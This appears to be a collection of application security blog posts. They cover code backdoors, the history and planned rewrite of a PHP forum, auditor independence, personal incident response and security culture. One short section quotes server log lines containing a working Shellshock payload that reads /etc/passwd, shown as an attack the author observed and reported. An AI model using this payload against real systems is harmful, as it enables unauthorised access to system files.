On backdoors and malicious code

So since ASVS 3.0 retired much of the malicious code requirements, and after actually doing a line by line search of ~20 kLOC of dense J2EE authentication code, I’ve been thinking about the various ways backdoors might be created so as not to be findable by either automated or line by line searches.

This is obviously topical given the recent Juniper revelation that they found a backdoor in the VPN code of their SOHO device firmware. It also feels like the sort of thing that Apple suffered with GOTO FAIL, and that Linux nearly suffered a long time ago with the attempted wait4 backdoor.

https://freedom-to-tinker.com/blog/felten/the-linux-backdoor-attempt-of-2003/

So basically, I’ve been thinking that there obviously has to be a group dedicated to obfuscated backdooring – making code that passes the visual and automated muster of specialists like me. There is probably another group, or a portion of the same group, that sets about gaining sufficient privileges to make these changes without being noticed.

So before anyone goes badBIOS on me, I think it would be useful if we started to learn what malicious coding looks like in every language likely to be backdoored.

We can help prevent these attacks by improving the agile SDLC process and keeping closer tabs on our repos. We could also make these things much harder to slip in if folks stuck to an agreed formatting style, enforced by automated indentation and linting that flags missing block braces and assignment within conditionals. Yes, this will make some code visually longer, but we cannot tolerate more backdoors.

I’ve been doing a LOT of agile SDLC security work in the last few years, working WITH the developers on creating actually secure development processes and resilient applications, rather than reviewing the finished product and declaring their babies ugly. The latter does not work. You cannot review your way to building secure applications. We need to work with developers.

This is important as we’re starting to see an explosion in language use. It’s not enough to understand how these things are done in C or C++; we need to understand any systems language, and any up and coming language, for many of which we have zilch, nada, nothing in the way of automated tools, code quality tools, or specialists familiar with Go, Clojure, Haskell, and any number of other languages I see pop up from time to time.

What I think doesn’t work is line by line reviewing. All of these pieces of code must have been looked at by many people (the many eyeballs fallacy) and run past a bunch of automated source code analysis tools, and it was “all good” – but it wasn’t really. Who knows how many secure code review specialists like me looked at the code? We need better knowledge and better techniques that development shops can implement. I bet we haven’t seen the last of Juniper style attacks. Most firms are yet to really look through their unloved bastard repos full of code from developers past, present and future.

Time to start rebuilding GaiaBB

In a life a long time ago, in early 2002, we had to move Australia’s largest Volkswagen car forum from EzyBoard, which was serving malicious ads and hard to get rid of pop ups to our users, to our own forum software. After a product selection, I chose XMB, which was (and is) better than all the other free forums out there, such as phpBB (which didn’t have attachments until v3.0!), and others.

XMB was a good choice as it had so many features. What I didn’t know is that XMB was full of security holes. XMB started life as a two week effort by a then 14 year old, who had limited capabilities in writing secure software. If you looked at the OWASP Top 10 and XMB, XMB had at least one of everything. We had XSS, we had SQL injection, we had access control problems, we had authentication bypass, we had … you name it, we had it. Boards were being pwned all over. So I started to help XMB, and soon became their security manager.

The story of XMB’s rise and fall is long and complicated, with many machinations over its history. There were multiple changes of lead developer, at least one of which I caused – something I’m not proud of, and which realistically covered no one in glory. The original 14 year old was pushed out before I got there, and there were various stories floating around, but one of the interesting things is that as a result, a company thought they owned a free software project. I pushed to have our software adopt the GPL, which was accepted at the time, and it’s the only reason that XMB and all its forks, including GaiaBB, have lasted to this day.

XMB was forked relentlessly, being the basis of MyBB and OpenBB, as well as UltimaBB and then GaiaBB. The late 2000’s were not friendly to XMB: the loss of the main development system and a change of “ownership” caused many rifts. Then there was another failed fork called UltimateXMB, which started as a mod central for XMB, but then turned into a fully customised version of XMB like UltimaBB, though closer in database schema to XMB itself. The last fork of XMB, XMB 2, was a last ditch effort to stop it dying, but it failed as well when the last “owner” of XMB decided to use DMCA take down requests – which is illegal, as I owned the copyright of many of the files in XMB, as did others, particularly John Briggs and Tularis. That last remnant of the one true tree of XMB can be found at XMB Forum 2.

In 2007, I forked XMB with John Briggs, creating UltimaBB. Life was good for a while: we had momentum, and it worked better than XMB during those years. After the loss of the XMB master SVN tree, XMB 1.9.5 was resurrected as effectively a reverted version of UltimaBB. Then life changed for me, with a move to the US and having a child, so we parted ways – sad for me at the time, as I knew what would happen without a strong and active lead developer. Eventually UltimaBB withered too. I had to fork UltimaBB, creating GaiaBB, as I needed to keep my car forum Aussieveedubbers alive and secure.

GaiaBB got only just enough love to keep it secure, but it hasn’t kept up. It barely functions on PHP 5.6, and modern browsers render it funny. With the technical debt of 14 year old “modular” code originally written by a 14 year old (header.php and functions.php are both monolithic and stupidly long), it’s time to call time on it.

So I need to start over or find something new for my forum. As I need to keep my skills up with the modern kids writing software today, I’ve decided to make the investment in re-writing the software so I can learn about modern Ajax frameworks, and have a go at writing back end code. No small part of this is that I want to learn about security measures as a developer. As a code reviewer and penetration tester, you can’t talk to developers unless you know how applications are built and tested, and all the compromises that go into making applications actually run.

GaiaBB

So let’s talk about GaiaBB. Compared to most PHP forum software, it’s pretty secure. It’s got all the features you would ever need and then a lot more on top of that. But it’s a spaghetti nightmare. It needs a total re-write. It has no responsive design in any shape or form, so mobile users just can’t use it. There are heaps of bugs that need fixing. There’s no test suite. Database compatibility is not its strong point.

Frontend decision – Polymer

After looking around, I’ve decided that the front end shall be Polymer as it has good anti-XSS controls and is rapidly evolving. It does responsive design like no one’s business. And because Polymer hasn’t got the cruft of some of the alternatives it will make me think harder about the UI design of the forum software.

Back in the day, we crammed as many pixels and features into a small space because that was the thing then. Nowadays, it’s more about paring back to the essentials. This is critical for me as I don’t have the time to put back EVERY feature of GaiaBB, but as I know most features are never used, that’s not a big deal.

Backend considerations

Now, I need to choose a back end language to do the re-write. My requirements are:

  • Must be workable on as many VPS providers as possible, as many do not provide a way to run non-PHP applications without difficulty
  • Must be fast to develop in, so I am not interested in enterprise style languages that require hundreds of lines of cruft where one line is actually required
  • Must support RESTful APIs
  • Must support OAuth authentication: although I can write an identity provider, I am more than willing to let forum owners integrate our identity with Facebook Connect or Google+
  • Must use an entity framework for data access. The days of writing SQL queries are done; I want database transparency
  • Must support writing automated unit and integration tests. This is not optional

So far, I’ve looked at various languages and frameworks, including:

  • PHP. OMG the pain. There are literally no good choices here. You’d think because I have a lot of the business logic already in PHP that this would be a no-brainer, but the reality is that I have terrible code that is untestable.
  • Go. Very interesting choice, as it’s a systems language that explicitly supports concurrency and all sorts of use cases. However, it does not necessarily follow that writing backend code in Go is the way to go, as I’ve not found a lot of examples that implement RESTful web services. It’s possible, as it’s a systems language, but I don’t want to be the bunny doing the hard yards.
  • Groovy and Grails. I have clients who use this, so I am interested in learning the ins and outs, as it seems pretty self documenting and fast to write. It runs on the JVM.
  • Spring. Many clients use this, but I do not like how much glue code Java makes you write to do basic things. Patterns implemented in Spring seem to take forever to provide a level of abstraction that is not required in real life. I want something simpler.

Frameworks I will not consider

The few remaining XMB, UltimaBB, and GaiaBB forums need to be migrated to something modern, and that requires support. I don’t have time for support, so I am going to exclude a few things now.

  • Python / Django. I don’t write Python. Few clients use it and I don’t want to be figuring out or supporting a Python web service layer.
  • Node.js. I know this was hot a few years ago, but seriously, I need security, and writing a backend in something that does not protect against multi-threaded race conditions is not okay.
  • Ruby on Rails. I was thinking about this for a bit, but honestly, I’ve never had to review a Ruby on Rails application, so re-writing my business logic and entities in it will not give me more insight than using Groovy/Grails, where I do have clients.

At the moment, I’m undecided. I might use Groovy/Grails, as it’s the simplest choice so far and supports exactly what I want to do. That said, Groovy/Grails is starting to lose corporate backing, and I don’t want to use a language that might end up on the scrapheap of history.

What would you do? I’m interested in your point of view if you’ve done something interesting as a RESTful API.

Looking back at 2009 and Predictions for 2015

I looked back at the “predictions” for 2010, a post I wrote five years ago, and found that besides the dramatic increase in mobile assessments this last year or two, the things I was banging on about in 2009 are still issues today:

Developer education is woeful. I recently did an education piece for a developer crowd at a client, and only two of 30 knew what XSS was, and only one of them was aware of OWASP. At least at a University event I did later on in the year, about 20% of the students were aware of OWASP, XSS, SQL injection and security. The other 80% – not so much. I hope I reached them!

Agile security is woeful. When agile first came out, I was enthralled by the chance for an SDLC to be secure by default because they wrote tests. Unfortunately, many modern day practitioners felt that all non-functional requirements were in the category of “you ain’t gonna need it”, and so the state of agile SDLC security is just abysmal. There are some shops that get it, but this year, I made the acquaintance of an organisation that prides themselves on being agile thought leaders, who told our mutual client they don’t need any of that yucky documentation, up front architecture or design, or indeed any security stuff, such as constraints or filling in the back of the card with non-functional requirements.

Security conferences are still woeful. Not only is there a distinct lack of diversity in many conferences (zero women speakers at Ruxcon for example), very few have “how do we fix this?” talks. Take for example, the recent CCC event in Berlin. The media latched onto talks about biometric security failing (well, duh!) and SS7 insecurity (well, duh! if you’ve EVER done any telco stuff). Where are the talks about sending biometrics to the bottom of the sea with concrete shackles or replacing SS7 with something that the ITU hasn’t interfered with?

Penetration testing still needs to improve. I accept some of the blame here, because I was unable to change the market – pen tests still sell really well. We really need to move on from pen tests as a wasted opportunity cost for actual security. We should be selling hybrid application verifications – code reviews with integrated pen tests to sort out the exploitability of vulnerabilities properly. Additionally, there is a race to the bottom of the barrel, with folks selling 1–2 day automated tests as equivalent to a full security verification for as little money as they can. We need a way of distinguishing weak tests from strong tests so the market can weed out useless checkbox testing. I don’t think red teaming is the answer, as it’s a complete rod length check that can cause considerable harm unless performed with specific rules of engagement – rules most red team folks would think invalidate a red team exercise.

Secure supply chain is still an unsolved problem. No progress at all since 2009. Software enjoys the unique position that – unlike all other goods and services – it is somehow special and needs special liability protection. That might have been true back in the 70’s during the home brew days, but it’s not true today. We are outsourcing and out-tasking more and more every day, and until liability is reversed and suppliers are required to uphold the standard fit for purpose rules that all other manufacturers and suppliers must, we are going to get more and more breaches and end of company events. Just remember: you can outsource all you like, but you can’t outsource responsibility. If managers are told “it’s insecure” and take no or futile steps to remediate it, I’m sorry, but those managers are accountable and liable.

At least, due to the rapid adoption of JavaScript frameworks, we are starting to see a decline in traditional XSS. If you don’t know how to attack responsive JSON or XML API based apps and DOM injections, you are missing out on new style XSS. Any time someone tells you that security is hard to adopt because it requires so much refactoring, point them at any responsive app that started out life a long time ago. There’s way more refactoring in changing to responsive design and RESTful API than adding in security.

Again, due to the adoption of frameworks, such as Spring MVC and so on, we are starting to see a slight decline in the number of apps with CSRF and SQL injection issues. SQL injection used to be about 20-35% of all apps I reviewed in the late 2000’s, and now it’s fairly rare. That said, I’ve had some good times in 2014 with SQL injection.

The only predictions I will make for 2015 is a continued move to responsive design, using JavaScript frameworks for web apps, a concerted movement towards mobile first apps, again with a REST backend, and an even greater shift towards cloud, where there is no perimeter firewall. Given the lack of security architecture and coding knowledge out there, we really must work with the frameworks, particularly those on the backend like node.js and others, to protect front end web devs from themselves. Otherwise, 2015 will continue to look much like 2009.

So the best predictions are those you work on to fix. To that end, I was recently elected by the OWASP membership to the Global Board as an At Large member. And if nothing else – I am large!

  • I will work to rebalance our funding. Instead of delivering most of OWASP’s funds directly back to members who pay a membership fee and then don’t spend their allocated chapter funds, we should focus on building OWASP’s relevance and future: spending around 30% on our projects, standards, and training, 30% on outreach, 30% on membership, and 10% or less on admin overheads.
  • I will work towards ensuring that we talk to industry standards bodies and deal OWASP into the conversation. We can’t really complain about ISO, NIST, or ITU standards if they don’t have security SMEs to help draft these standards, can we?
  • I will work towards redressing the lack of diversity, both in gender and region, in our conferences, as well as creating a speaker list that developer conferences can look through to invite great local appsec experts for talks. We have so many great speakers with so much to say, but we have to get outside the echo chamber!
  • We have to increase our outreach to universities. We’ve lost the opportunity to train the folks who will become the lead devs and architects in the next 5–10 years, but we can work with the folks coming behind them. Hopefully, we can invest time and effort into reaching those already in the industry in senior/lead developer, architect, and business analyst roles, but in terms of immediate bang for buck, we really need to move university level education beyond the few “ethical hacking” courses (which are a trade qualification), and work on building security knowledge into the software engineers and comp sci students of the future. Ethical hacking courses have a place … for security experts, but for coders, they are a complete waste of time. Unless they are doing offensive security as their day job, software devs do not need to know how to discover vulnerabilities and code exploits, except in the most general of ways.

It’s an exciting time, and I hope to keep you informed of any wins in this area.

Independence versus conflict of interest in security reviews

I was giving a lecture to some soon to be graduating folks today, and at the end of the class, a student came up and said that he wasn’t allowed to work with auditors because “it was a conflict of interest”.

No, it’s not. And here’s why.

Conflict of interest

It’s only conflict of interest if a developer who wrote the code then reviews the code and declares it free of bugs (or indeed, is honest and declares it full of bugs). In either case, it’s self review, which is a conflict of interest.

The only way the auditor is in a conflict of interest is if the auditor reviews code they wrote. This is self-review.

An interesting corner case that requires further thought is rare indeed: I wrote or participated in a bunch of OWASP standards, some of which became bits of other standards and certifications, such as PCI DSS section 6.5. Am I self-reviewing if I review code or applications against these standards?

I think not, because I am not changing the standard to suit the review (which is an independence issue),  and I’m not reviewing the standard (which would be self-review, which is a conflict of interest).

Despite this, where I think an independence in appearance issue might arise, I always disclose that I created or had a hand in these various standards – especially if I recommend that a client use a standard I had a hand in.

Independence

Independence is not just an empty word, it’s a promise to our clients that we are not tied to any particular vendor or methodology. We can’t be a trusted advisor if we’re a shill for a third party or are willing to compromise the integrity of review at a customer’s request.

The usual definition of independence is two pronged:

  • Independence in appearance. Someone might think you are compromised because of affiliations or financial interests, such as a previous job. For example, if you’ve always worked for incident response tool vendors and then move to a security consultancy, you might feel you are independent, but others might perceive you as having a pro-IR toolset point of view.
  • Independence in actuality. If you own shares in or get a financial reward for selling a product, any recommendation you make about that product is suspect. This is the reason I want OWASP to remain vendor neutral.

If either of these prongs are violated, you are not independent. But just as humans are complex, there are many aspects to independence, and I’ve not learnt them all. I know most of the issues, been there got the t-shirt.

As a reviewer, there are a few areas of independence that I refuse to relinquish (and I hope you do too!):

  • Scoping questions. I don’t mind customers setting a scope, but I will often argue for the correct scope before we start. Too narrow a scope can railroad a review into giving an answer the client wants, rather than a proper independent review.
  • Review performance independence. If the client tries to make the review so short that I can’t complete my normal review program effectively, stops me from getting the information I need, or tries to frame negative observations in a lesser or “meh” context, I will resist. I want the review to be accurate, but not at the expense of my methodology or my usual standards.
  • Risk ratings and findings. In the last few years, I’ve had folks try to force real findings to become unrated opportunities for improvement (by definition, all of my findings are such), try to argue risk ratings down, or try to get words changed to suit a desired outcome. Again, I want the context to be accurate, and I will listen to your input and arguments, but only I will write the report and set the risk ratings. Otherwise, why bother hiring an external reviewer? You could write your own report and set the ratings to suit. It doesn’t work that way.

Does independence always need to be achieved?

My personal view on this has changed over the years. I used to toe the strict party line on independence.

However, sometimes as a reviewer, you can be part of the solution. I personally believe that a good working relationship between the reviewer and the folks who produced the application or code is a good thing. Both parties can learn from working closely together, work out the best approach to resolving issues, and test it rapidly.

As long as the self-review aspect is properly managed, I believe this to be a good path forward. I don’t see it as being any different from a traditional review that recommends fix X and then verifies that X has been put into place. However, if the auditor is editing code, the line has been crossed.

Work with the business to document agreed rules of engagement early, prior to work commencing. Both parties will get a lot more mileage from a closely cooperative review than from the “pay someone to sit in the corner for two weeks” engagement that is the standard fare of our industry.

Conclusion

Working together has obvious independence issues, particularly from an appearance point of view. So, to the excellent question from a student today: working tightly with the auditors is not a conflict of interest, but it can be an independence issue if not properly managed by both the business and the reviewer.

Some people don’t get the hint

85.25.242.250 - - [28/Sep/2014:09:20:12 -0400] "GET / HTTP/1.1" 301 281 "-" "() { foo;};echo;/bin/cat /etc/passwd"
85.25.242.250 - - [28/Sep/2014:22:30:48 -0400] "GET / HTTP/1.1" 500 178 "-" "() { foo;};echo;/bin/cat /etc/passwd"

That’s the Shellshock (CVE-2014-6271) payload in the User-Agent header. Dear very stupid attacker, you have the opsec of a small kitten who is surprised by his own tail. Reported.

So it’s finally happened

Passwords. Pah.

After running my blog on various virtual hosts and VPSs since 1998, my measures put into place to protect this site and the others on here were insufficient to protect against weak passwords.

Let’s just say that if you are a script kiddy and know all about press.php, tmpfiles.php and others, you have terrible operational security. There will be consequences. That is not a threat.

AppSec EU – DevGuide all day working party! Be a part of it!

Be a part of the upcoming AppSec EU in Cambridge!

Developer Guide Hackathon

* UPDATE! Eoin can’t be in two places at once, so our hack-a-thon has moved to Tuesday 24 June. Same room, same bat channel. *

Eoin Keary and I will be running an all day working party on the Developer Guide on June 24 from 9 AM to 6 PM GMT. The day starts with Eoin giving a DevGuide status update talk, and then we get down to editing and writing.

I will be working remotely from the end of Eoin’s talk until 1 pm UK time, so I encourage everyone who has an interest in the DevGuide to either attend the workshop in person or consider helping out remotely. Sign up here!

https://www.owasp.org/index.php/Projects_Summit_2014/Working_Sessions/004

My goal is to get the entire text of the OWASP Developer Guide 2.0 ported to the new format at GitHub, and hopefully finish 4 chapters. To participate, you will need a browser and a login to GitHub. You will also probably want a login to Google+ so you can be a part of an “on air” all day hangout so you can ask me anything about the DevGuide, or just chill with other remote participants.

Stop. Just stop.

In the last few weeks, a prominent researcher, Dragos Ruiu (@dragosr) has put his neck out describing some interesting issues with a bunch of his computers. If his indicators of compromise are to be believed (and there is the first problem), we have a significant issue. The problem is the chorus of “It’s not real” “It’s impossible” “It’s fake” is becoming overwhelming without sufficient evidence one way or another. Why are so many folks in our community ready to jump on the negative bandwagon, even if they can’t prove it or simply don’t have enough evidence to say one way or another?

My issue is not “is it true” or “I think it’s true” or “I think it’s false”, it’s that so many info sec “professionals” are basically claiming:

  1. Because I personally can’t verify this issue is true, the issue must be false. QED.

This fails both Logic 101, class 1, and also the scientific method. 

This is not a technical issue, it’s a people issue.

We must support all of our researchers, particularly those who turn out to be wrong. This should be entirely obvious. If we eat our young and most venerable in front of the world’s media, we will be a laughing stock. Certain “researchers” are used by their journalist “friends” to say very publicly, “I think X is a fool for thinking his computers are suspect”. This is utterly wrong and foolhardy, and it works for the click bait articles the journalists write and their news cycle, not for us.

Not everybody is a viable candidate for having the sample. In my view, the only folks who should have a sample of this thing are those who have sufficient operational security and budget to brick and then utterly destroy at least two or twenty computers in a safe environment. That doesn’t describe many labs. And even then, you should have a good reason for having it. I consider the sample described to need the electronic equivalent of a PC4 bio lab. Most labs are not PC4, and I bet most infosec computing labs are nowhere near capable of hosting this sample.

Not one of us has all of the skills required to look at this thing. The only way this can be made to work is by working together, pulling together E.Eng folks with the sort of expensive equipment only a well funded organisation or a university lab might muster, microcontroller freaks, firmware folks, CPU microcode folks, USB folks, file system folks, assembly language folks, audio folks, forensic folks, malware folks, folks who are good at certain types of Windows font malware, and so on. There is not a single human being alive who can do it all. It’s no surprise to me that Dragos has struggled to get a reproducible but sterile sample out. I bet most of us would have failed, too.

We must respect and use the scientific method. The scientific method is well tested and true. We must rule out confirmation bias, and we must rule out the mundane – “well, a $0.10 audio chip will do that, as most of them are paired with $0.05 speakers and most of the time it doesn’t matter”. I actually don’t care if this thing is real or not. If it’s real, there will be patches. If it’s not real, it doesn’t matter. I do care about the scientific method, and its lack of application in our research community. We aren’t researchers for the most part, and I find it frustrating that most of us don’t seem to understand the very basic steps of careful lab work and repeating important experiments.

We must allow sufficient time to allow the researchers to collaborate and either have a positive or negative result, analyse their findings and report back to us. Again, I come back to our journalist “friends”, who can’t live without conflict. The 24 hour news cycle is their problem, not our problem. We have Twitter or Google Plus or conferences. Have some respect and wait a little before running to the nearest J “friends” and bleating “It’s an obvious fake”.

We owe a debt to folks like Dragos who have odd results, and who are brave enough to report them publicly. Odd results are what push us forward as an industry. Cryptanalysis wouldn’t exist without them. If we make it hard or impossible for respected folks like Dragos to report odd results, imagine what will happen next time. What happens if it’s someone without much of a reputation? We need a framework to collaborate, not to tear each other down.

Our industry’s story is not the story of the little boy who cried wolf. We are (or should be) more mature than a child’s nursery tale. Have some respect for our profession, and work with researchers rather than sullying their names (and yours and mine) by announcing, before you have proof, that something’s not quite right. If anything, we must celebrate negative results every bit as much as positive results, because I don’t know about you, but I work a lot harder when I know an app is hardened – I try every trick in the book, including the bleeding edge stuff, as a virtual masterclass in our field. I bet Dragos has given this the sort of inspection that only the most ardent forensic researcher might have done. If he hasn’t gotten that far, either it’s sufficiently advanced to be indistinguishable from magic, or he needs help to let us understand what is actually there. I bet that few of us could have gotten as far as Dragos has.

To me, we must step back and work together as an industry. Ask Dragos: “What do you need?” “How can we help?” And if the answer is “give me time”, then let’s step back and give him time. If it’s a USB circuit analyser or a microcontroller dev system plus some mad soldering skills, well, help him, don’t tear him down. Dragos has shown he has sufficient operational security to research this for another 12–24 months. We don’t need to know now, now, or now. We gain nothing by trashing his name.

Just stop. Stop trashing our industry, and let’s work together.

So your Twitter has been hacked. Now what?

So I’m getting a lot of Twitter spam with links to install bad crap on my computer.

More than just occasionally, these DMs are sent by folks in the infosec field, who should know better than to click unknown links without taking precautions.

So what do you need to do?

Simple. Follow these basic NIST-approved incident response steps:

Contain – find out how many of your computers are infected. If you don’t know how to do this, assume they’re all suspect, and ask your family’s tech support. I know you all know the geek in the family, as it’s often me.

Eradicate – Clean up the mess. Sometimes you can just use anti-virus to clean it up; other times you need to take drastic action, such as a complete re-install. As I run a Mac household with a single Windows box (the wife’s), I’m moderately safe, as I have very good operational security skills. If you’re running Windows, it’s time for Windows 8, or if you don’t like Windows 8, Windows 7 with IE 10.

Recover – If you need to re-install, you had backups, right? Restore them. Get everything back the way you like it.

  • Use the latest operating system. Windows XP has six months left on the clock. Upgrade to Windows 7 or 8. MacOS X 10.8 is a good upgrade if you’re still stuck on an older version. There is no reason not to upgrade. On Linux or your favorite alternative OS, there is zero reason not to use the latest LTS or latest released version. I make sure I live within my home directory, and have a list of packages I like to install on every new Linux install, so I’m productive in Linux about 20-30 minutes after installation.
  • Patch all your systems with all of the latest patches. If you’re not good with this, enable automatic updates so it just happens for you automatically. You may need to reboot occasionally, so do so if your computer is asking you to do that. On Windows 8, it only takes 20 or so seconds. On MacOS X, it even remembers which apps and documents were open.
  • Use a safer browser. Use IE 10. Use the latest Firefox. Use the latest Chrome. Don’t use older browsers or you will get owned.
  • On a trusted device, preferably one that has been completely re-installed, it’s time to change ALL of your passwords, as they are ALL compromised unless proven otherwise. I use a password manager. I like KeePassX, 1Password, and a few others. None of my accounts shares a password with any other account, and they’re all ridiculously strong.
  • Protect your password manager. Make sure you have practiced backing up and restoring your password file. I’ve got it sprinkled around in a few trusted places so that I can recover my life if something bad was to happen to any single or even a few devices.
  • Backups. I know, right? It’s always fun until all your data and life is gone. Backup, backup, backup! There are great tools out there – Time Capsule for Mac, Rebit for Windows, rsync for Unix types.
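Those “ridiculously strong” unique passwords don’t need a commercial tool to generate; any language with a cryptographically secure random number generator will do. A minimal sketch in Python – the 24-character length and the letters/digits/punctuation alphabet are my illustrative choices, not a recommendation from any particular standard:

```python
import secrets
import string

def random_password(length: int = 24) -> str:
    """Generate one random password using a cryptographically secure RNG.

    The length and alphabet here are illustrative assumptions,
    not a standard's recommendation.
    """
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))

# One fresh password per account; the manager remembers them so you don't have to.
print(random_password())
```

Password managers do essentially this internally; the point is that uniqueness and length, not memorability, do the work.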

Learn and improve. It’s important to make sure that your Twitter feed remains your Twitter feed, and that all of your other accounts remain yours, too.

I never use real data for security questions and answers, such as my mother’s maiden name, which is a matter of public record, or my birth date, which, like everyone else, I celebrate once per year, so you could work it out if you happened to meet me at the right time of year. These are shared-knowledge questions, and an attacker can use them to bypass Twitter’s, Google’s, and Facebook’s security settings. I either make the answer up or just insert a random value. For something low-security like a newspaper login, I don’t track these random values, as I have my password manager to keep track of the actual password. For high-value sites, I will record the random value for “What’s your favourite sports team?”. It’s always fun reading out 25 characters of gibberish to a call centre in a developing country.

Last word

I might make a detailed assessment of the DM spam I’m getting, but honestly, it’s so amateur hour I can’t really be bothered. There is no “advanced” persistent threat here – these guys have no need to try harder when folks don’t undertake even the most basic self-protection.

Lastly – “don’t click shit”. If you don’t know the person or the URL seems hinky, don’t click it.

That goes double for infosec pros. You know better, or you will just after you click the link in Incognito / private mode. Instead, if you really insist on getting pwned, why not fire up that vulnerable but isolated XP throwaway VM with a MITM proxy and do it properly? If you don’t have time for that, don’t click shit.

Infosec apostasy

I’ve been mulling this one over for a while. And honestly, after putting forward my ideas in a post to an internal global mailing list at work, I’ve come to realise there are at least two camps in information security:

  • Those who aim via various usual suspects to protect things
  • Those who aim via various often controversial and novel means to protect people 

Think about this for one second. If your compliance program is entirely around protecting critical data assets, you’re protecting things. If your infosec program is about reducing fraud, building resilience, or reducing harmful events, you’re protecting people, often from themselves.

I didn’t think my rather longish post, which brought together the ideas of the information swarm (it’s there, deal with it), information security asymmetry, and pets vs cattle (I rather like this one), would land with a heavy thud akin to 95 bullet points nailed to the church door.

So I started thinking – why do people still promulgate stupid policies that have no bearing on evidence? Why do people still believe in policies, standards, and spending squillions on edge and endpoint protection when it is trivial to break them?

Faith.

Faith in our dads and granddads, that their received wisdom is appropriate for today’s conditions.

“Si Dieu n’existait pas, il faudrait l’inventer” – Voltaire

(Literally “If God did not exist, it would be necessary to invent him”; often mis-translated as “if religion did not exist, it would be necessary to create it”, but close enough for my purposes.)

I think we’re seeing the beginning of infosec religion, where it is not acceptable to speak up against unthinking enforcement of hand-me-down policies like 30-day password resets or absurd password complexity, and where it is impossible to propose reasonable alternatives when you attempt to rule out imbecilic practices like basic authentication headers.

We cannot expect everyone using IT to do it right, or to have high levels of operational security. Folks often have a quizzical laugh at my rather large random password collection and my use of virtual machines to isolate Java and an icky SOE. But you know what? When LinkedIn got pwned, I had zero fears that my use of LinkedIn would compromise anything else. I had used a longish random password unique to LinkedIn. So I could take my time to reset that password, safe in the knowledge that even with the best GPU crackers in existence, the heat death of the universe would come before my password hash was cracked. Plenty of time. Fantastic … for me, and I finally get a payoff for being so paranoid.
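That “heat death of the universe” claim is easy to sanity-check with back-of-envelope arithmetic. A sketch, assuming a 20-character password drawn uniformly from a 94-symbol alphabet and an attacker making 10^12 guesses per second – both figures are my assumptions, not numbers from the LinkedIn breach itself:

```python
import math

# Illustrative assumptions, not figures from the actual breach:
alphabet_size = 94           # printable ASCII, minus space
length = 20                  # a "longish" random password
guesses_per_second = 10**12  # a generously fast GPU cracking rig

entropy_bits = length * math.log2(alphabet_size)  # ~131 bits
keyspace = alphabet_size ** length
years_to_exhaust = keyspace / guesses_per_second / (60 * 60 * 24 * 365)

print(f"{entropy_bits:.0f} bits of entropy")
print(f"~{years_to_exhaust:.1e} years to exhaust the keyspace")
```

Even if you make the attacker a million times faster, the exponent barely moves – which is the whole point of long, per-site random passwords.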

But… I don’t check my main OS every day for malware I didn’t create. I don’t check the insides of my various devices for evil-maid MITM implants or keyloggers. Let’s be honest – no one but the ultra-paranoid does this, and they don’t get anything done. But infosec purists expect everyone to have a bleached-white pristine machine to do things – or else the user is at fault for not maintaining their systems.

We have to stop protecting things and start protecting humans, by creating human-friendly, resilient processes with appropriate checks and balances that do not break as soon as a keylogger, a network sniffer, or, more to the point, some skill is brought to bear. Security must be agreeable to humans, transparent (in plain sight as well as easy to follow), and equitable, and the user has to be in charge of their identity and linked personas, and ultimately their preferred level of privacy.

I am nailing my colours to the mast – we need to make information technology work for humans. It is our creature, to do with as we want. This human says “no”.